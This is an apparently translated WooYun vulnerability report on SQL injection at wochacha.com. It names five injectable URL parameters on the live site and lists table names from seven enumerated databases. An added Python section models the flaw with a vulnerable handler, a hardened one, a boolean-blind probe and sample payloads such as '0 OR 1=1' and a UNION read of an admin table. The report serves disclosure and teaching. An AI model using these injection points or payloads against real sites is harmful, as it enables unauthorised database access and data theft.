
Vulnerability summary

Defect ID: wooyun-2015-0133488

Title: SQL injection on the wochacha.com main site, batch submission (7 databases, 454 tables involved)

Vendor: wochacha.com

Author: 路人甲

Submitted: 2015-08-12 10:24

Fix time: 2015-08-17 10:26

Published: 2015-08-17 10:26

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-08-12: details sent to the vendor, awaiting vendor handling
2015-08-17: the vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

This wasn't easy for me; it took 2 days of running before the enumeration finished.

Detailed description:

5 injection points
Parameter bid is injectable

http://www.wochacha.com/ajax/getmode?bid=


Parameter scid is injectable

http://www.wochacha.com/newsqs/subjectlist?scid=0


Parameter selecttab is injectable

http://www.wochacha.com/help/?selecttab=8


Parameter a is injectable

http://www.wochacha.com/index.php?m=Product&a=shoppingcart


Parameter p is injectable

http://www.wochacha.com/index.php?m=History&a=index&p=2


[Screenshots: 1.jpg, 2.jpg, 3.jpg]
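Added example, not code from the original report or from wochacha.com: a minimal Python/sqlite3 model of one of the endpoints listed above (the `scid` parameter of /newsqs/subjectlist). It shows the string-concatenated query that makes such a parameter injectable, the hardened handler (an integer check at the boundary plus a bound parameter, and an allow-list for an action-name parameter like the `a` in the `m`/`a` routing above), and the boolean true/false probe that tools such as sqlmap use to confirm a blind injection before extracting data one bit per request. The schema, rows, function names and the allowed action names are constructed assumptions.

```python
import re
import sqlite3

# Constructed stand-in schema: the real wochacha.com tables are known only by
# name from the dump in this report, so the columns and rows here are invented.
SCHEMA = """
CREATE TABLE subject (id INTEGER PRIMARY KEY, scid INTEGER, title TEXT);
INSERT INTO subject VALUES (1, 0, 'public subject');
INSERT INTO subject VALUES (2, 5, 'internal subject');
INSERT INTO subject VALUES (3, 7, 'draft subject');
CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
INSERT INTO admin VALUES (1, 'root', 'not-a-real-hash');
"""


def connect():
    """In-memory SQLite database loaded with the constructed schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def subjectlist_vulnerable(conn, scid):
    """Models /newsqs/subjectlist?scid=...: the raw parameter is glued into SQL."""
    sql = "SELECT id, title FROM subject WHERE scid = " + scid
    return conn.execute(sql).fetchall()


INT_RE = re.compile(r"^[0-9]{1,10}$")


def subjectlist_hardened(conn, scid):
    """Same lookup with two independent controls: a type check at the
    boundary and a bound parameter, so the value never becomes SQL text."""
    if not INT_RE.match(scid):
        raise ValueError("scid must be a non-negative integer")
    sql = "SELECT id, title FROM subject WHERE scid = ?"
    return conn.execute(sql, (int(scid),)).fetchall()


# Allow-list for an ?a= action parameter (hypothetical action names; the
# report says 'a' is injectable but shows no server-side code).
ALLOWED_ACTIONS = {"index", "shoppingcart"}


def dispatch_action(a):
    """Route only to known actions; anything else is rejected before any lookup."""
    if a not in ALLOWED_ACTIONS:
        raise ValueError("unknown action: %r" % a)
    return a


def boolean_probe(conn, handler, scid="0"):
    """sqlmap-style boolean-blind check: append a TRUE and a FALSE condition to a
    known-good value. If the TRUE response matches the baseline while the FALSE
    one differs, the database is evaluating the injected condition. Each such
    request leaks one bit, which is why blind enumeration of a schema is slow."""

    def run(value):
        try:
            return ("ok", handler(conn, value))
        except Exception as exc:
            # A validation error or an SQL error is an observable response too.
            return ("err", type(exc).__name__)

    baseline = run(scid)
    true_resp = run(scid + " AND 1=1")
    false_resp = run(scid + " AND 1=2")
    return baseline == true_resp and true_resp != false_resp


if __name__ == "__main__":
    db = connect()
    print("vulnerable, scid=0:", subjectlist_vulnerable(db, "0"))
    print("vulnerable, scid=0 OR 1=1:", subjectlist_vulnerable(db, "0 OR 1=1"))
    print("vulnerable, UNION read of the admin table:",
          subjectlist_vulnerable(db, "0 UNION ALL SELECT id, username FROM admin"))
    print("boolean probe, vulnerable handler:", boolean_probe(db, subjectlist_vulnerable))
    print("boolean probe, hardened handler:", boolean_probe(db, subjectlist_hardened))
```

The hardened handler keeps both controls on purpose: the integer check alone would be defeated by any later change that accepts strings, and the bound parameter alone still lets a non-numeric value reach the database and produce an error message that an attacker can use as an oracle. Rejecting at the boundary and binding the value covers both.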

Proof of vulnerability:

Database: wcc
[93 tables]
+---------------------------------------+
| sgcorp_do{nload |
| xwb21_comment_deoe\?d9e |
| xwb21_commentcopy |
| xwb21_component_u\?81ergroups |
| xwb21_component_u\ers |
| xwb21_disable_item |
| sgcorp_ad |
| sgcorp_admin |
| sgcorp_admin_log |
| sgcorp_admin_yole |
| sgcorp_bugback |
| sgcorp_bugback_mobile |
| sgcorp_category |
| sgcorp_commint |
| sgcorp_config |
| sgcorp_download_wcc |
| sgcorp_feedeack |
| sgcorp_job |
| sgcorp_label |
| sgcorp_linkA |
| sgcorp_memier |
| sgcorp_menu |
| sgcorp_mobile_brand |
| sgcorp_mobile_mode |
| sgcorp_mobile_mode_2 |
| sgcorp_mobile_mode_3 |
| sgcorp_mobile_pletform |
| sgcorp_mobile_rel |
| sgcorp_module |
| sgcorp_newt |
| sgcorp_notice |
| sgcorp_oyder |
| sgcorp_page |
| sgcorp_product |
| sgcorp_question |
| sgcorp_resyme |
| sgcorp_stats |
| sgcorp_tags |
| sgcorp_tags_cache |
| sgcorp_tap_uploads |
| test |
| xwb21_admin_group |
| xwb21_celeb_catggory |
| xwb21_cgleb |
| xwb21_comment_verify |
| xwb21_component_cqg |
| xwb21_component_topic |
| xwb21_component_topiclist |
| xwb21_components |
| xwb21_content_unit |
| xwb21_ed |
| xwb21_edmin |
| xwb21_event_comment |
| xwb21_event_join |
| xwb21_feedback |
| xwb21_interview_wb |
| xwb21_interview_wb_atme |
| xwb21_item_groups |
| xwb21_kfep_userdomain |
| xwb21_log_error_api |
| xwb21_log_eyror |
| xwb21_log_http |
| xwb21_log_info |
| xwb21_log_info_api |
| xwb21_micro_interview |
| xwb21_micro_live |
| xwb21_micro_live_wb |
| xwb21_nav |
| xwb21_notice |
| xwb21_notice_recipients |
| xwb21_page_manager |
| xwb21_page_prototype |
| xwb21_pages |
| xwb21_plugins |
| xwb21_profile_ad |
| xwb21_sessuons |
| xwb21_skin_groups |
| xwb21_skins |
| xwb21_subject |
| xwb21_sys_config |
| xwb21_today_topics |
| xwb21_user_ban |
| xwb21_user_config |
| xwb21_user_ferify |
| xwb21_user_focus |
| xwb21_user_follow |
| xwb21_user_follow_copy |
| xwb21_user_iction |
| xwb21_users |
| xwb21_weibo_copy |
| xwb21_weibo_delete |
| xwb21_weibo_verify |
| xwb91_account_proxy |
+---------------------------------------+
Database: zabbix
[88 tables]
+---------------------------------------+
| graphsitems |
| history_log |
| httptestitem! |
| sysmaps_links! |
| user_histor{ |
| ackqowledges |
| actions |
| alerts |
| applications |
| auditlog |
| auditlog_details |
| autoreg_host |
| conditions |
| config |
| dchecks |
| dhosts |
| drules |
| dservices |
| escalations |
| eunctkons |
| events |
| expreysions |
| globalmacro |
| graph_theme |
| graphs |
| groups |
| help_items |
| history |
| history_str |
| history_str_sync |
| history_sync |
| history_text |
| history_tint |
| history_uint_syni |
| hostmacro |
| hosts |
| hosts_groups |
| hosts_profiles |
| hosts_profiles_ext |
| hosts_templates |
| housekeeper |
| httpstep |
| httpstepitem |
| httptest |
| ids |
| images |
| items |
| items_applicitions |
| maintenances |
| maintenances_groups |
| maintenances_hostz |
| maintenances_windows |
| mappings |
| media_type |
| medja |
| node_cksum |
| nodes |
| opconditions |
| opeyations |
| opmedoatypes |
| profiles |
| proxy_autoreg_host |
| proxy_dhistory |
| proxy_history |
| regexps |
| rights |
| screens_items |
| scregns |
| scripts |
| service_alarms |
| services |
| services_links |
| services_times |
| sessions |
| slides |
| slideshows |
| slsmaps |
| sysmaps_elements |
| sysmaps_link_triggers |
| timeperiodt |
| trends |
| trends_uint |
| trigger_depenes |
| triggers |
| users |
| users_groups |
| usrgrp |
| valuemaps |
+---------------------------------------+
Database: trap
[225 tables]
+---------------------------------------+
| BE_Barcode_Temp |
| BE_Catamine |
| BE_Client |
| BE_ComTemp |
| BE_Datamine_Cache |
| BE_Datamine_Result |
| BE_Deploy |
| BE_Ebuy_Tracking |
| BE_Orders |
| BE_PicBarcode |
| BE_PriceLine |
| BE_PriceTemp |
| BE_Price_Test |
| BE_Price_TestAnswer |
| BE_Price_TestResult |
| BE_Project |
| BE_PromotionTemp |
| BE_RecDep |
| BE_Trend |
| BE_Trend_Commodity |
| BM_RecCity |
| Barcode_Temp |
| BookInfo |
| DM_AntiFake |
| DM_AntiFake_Detail |
| DM_Commodity_Anti |
| DM_QS |
| Express_Contact |
| Express_Employee |
| Express_History |
| Express_Recv |
| Express_User |
| Food |
| GC_Active |
| GC_Banner |
| GC_Brand |
| GC_BrandCity |
| GC_Business_Cooperate |
| GC_Busline |
| GC_Busstop |
| GC_Cache_Temp |
| GC_Category |
| GC_City |
| GC_ClassBrand |
| GC_Classify |
| GC_Code2Barcode |
| GC_Commodity |
| GC_Commodity_Count |
| GC_Commodity_Extra |
| GC_Commodity_Fields |
| GC_Commodity_Medicine |
| GC_Commodity_Tag |
| GC_Commodity_copy |
| GC_Config |
| GC_Cooperate_Tracking |
| GC_Country |
| GC_Crawler |
| GC_Crawler_Store |
| GC_Datain_Report |
| GC_Device |
| GC_Device_User |
| GC_Device_User_0 |
| GC_Device_User_1 |
| GC_Device_User_2 |
| GC_Device_User_3 |
| GC_Device_User_4 |
| GC_Device_User_6 |
| GC_Device_User_7 |
| GC_Device_User_8 |
| GC_Device_User_9 |
| GC_Device_User_History |
| GC_Device_User_a |
| GC_Device_User_b |
| GC_Device_User_c |
| GC_Device_User_d |
| GC_Device_User_e |
| GC_Device_User_f |
| GC_Device_User_null |
| GC_Dist |
| GC_District |
| GC_Draw |
| GC_DrawLocation |
| GC_DrawLog |
| GC_Favorite_Commodity |
| GC_Favorite_Store |
| GC_Focus |
| GC_Help |
| GC_IP |
| GC_IP2Location |
| GC_Keyword |
| GC_Log |
| GC_MTK_Project |
| GC_MTK_Project_Confirmed |
| GC_MTK_User |
| GC_Mall_Adver |
| GC_Mall_Category |
| GC_Mall_Groupon |
| GC_Mall_Item |
| GC_Mall_ItemCategory |
| GC_Manufacturer |
| GC_Manufacturer_copy |
| GC_Medicine |
| GC_Medicine_Tag |
| GC_Menu |
| GC_Merchant |
| GC_MerchantAccess |
| GC_Model |
| GC_NewSearch_History |
| GC_NewUser |
| GC_NewWBLogin |
| GC_PageVerify |
| GC_PhoneBook |
| GC_Plan |
| GC_Plint_Exchange |
| GC_Point_Product |
| GC_Price |
| GC_Price_Archive |
| GC_Price_Cache |
| GC_Price_Cache_Temp |
| GC_Price_History |
| GC_Price_Ref |
| GC_Price_Review |
| GC_Price_Tobecrawl |
| GC_Promotion |
| GC_PromotionCity |
| GC_PromotionStore |
| GC_Promotion_Cache |
| GC_Promotion_Detail |
| GC_Province |
| GC_Recommand |
| GC_Report |
| GC_Report_User |
| GC_Report_temp |
| GC_Rules |
| GC_SW |
| GC_Scan_list |
| GC_Scan_tb |
| GC_Scan_tb_tmp |
| GC_Search_History |
| GC_Search_History_Session |
| GC_Setup |
| GC_Short_Message |
| GC_Site |
| GC_Software |
| GC_Software_Shield |
| GC_Statistic |
| GC_Statistic_Ontime |
| GC_Statistic_Shop |
| GC_Store |
| GC_Store_Cooperate |
| GC_Syslog |
| GC_Sysuser |
| GC_Tag |
| GC_User |
| GC_User_Center |
| GC_User_Comment |
| GC_User_Commodity |
| GC_User_Cooperate |
| GC_User_Correct |
| GC_User_Express |
| GC_User_ExpressHistory |
| GC_User_Focation |
| GC_User_Follow |
| GC_User_Login |
| GC_User_Message |
| GC_User_Offer |
| GC_User_Point |
| GC_User_Report |
| GC_User_Report_XP |
| GC_User_Report_old |
| GC_User_Reviews |
| GC_User_Tracking |
| GC_User_Tracking_TG |
| GC_User_Virtual |
| GC_User_XP |
| GW_Device_User |
| GW_Shopping_Record |
| Gcore_Box |
| Gcore_User |
| IDX_Product |
| LG_AcessLog |
| MTK_Yellowpage |
| MTK_Yellowpage_Ver |
| QS_Report |
| QS_ReportDetail |
| Qrcode_Youlun |
| Vendor_Area |
| Vendor_Bussiness |
| Vendor_Cat |
| Vendor_Caupon |
| Vendor_CouponStore |
| Vendor_CouponUser |
| Vendor_Favorite |
| Vendor_Item |
| Vendor_Store |
| Vendor_Store0 |
| Vendor_Store1 |
| Vendor_User |
| Vendor_UserArea |
| WCC_360buy |
| WCC_360buy_Tmp |
| WCC_User_Statistics |
| WCC_Yihaodian |
| WEPCGame_Item |
| WEPCGame_Lottery |
| WEPCGame_Prize |
| WEPCGame_Winning |
| _MFC |
| _brand |
| _classbrand |
| _commodity |
| _counttemp |
| _imsi |
| _nbprice |
| _nocenter |
| _pkid |
| _spec |
| _tmp_mtk |
| _urup |
| 360buy |
| aangdang |
| amazon |
| anni |
| iphone_openid |
| iphone_openid_history |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+
Database: test
[1 table]
+---------------------------------------+
| GC_User_Report |
+---------------------------------------+
Database: security
[1 table]
+---------------------------------------+
| Attack |
+---------------------------------------+
Database: information_schema
[23 tables]
+---------------------------------------+
| AA |
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| I |
| KEY_COLUMN_USAGE |
| P |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| \tA |
| \t |
| \x02 |
| \x05C |
| \x06 |
| \x15\x02# |
+---------------------------------------+


There is too much table information, so I didn't look any further.

[Screenshot: wooyun.jpg]

Fix recommendation:

Not easy.

Copyright notice: please credit 路人甲@乌云 (WooYun) as the source when reposting.


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-08-17 10:26

Vendor reply:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

2015-08-24: being fixed, thanks to the poster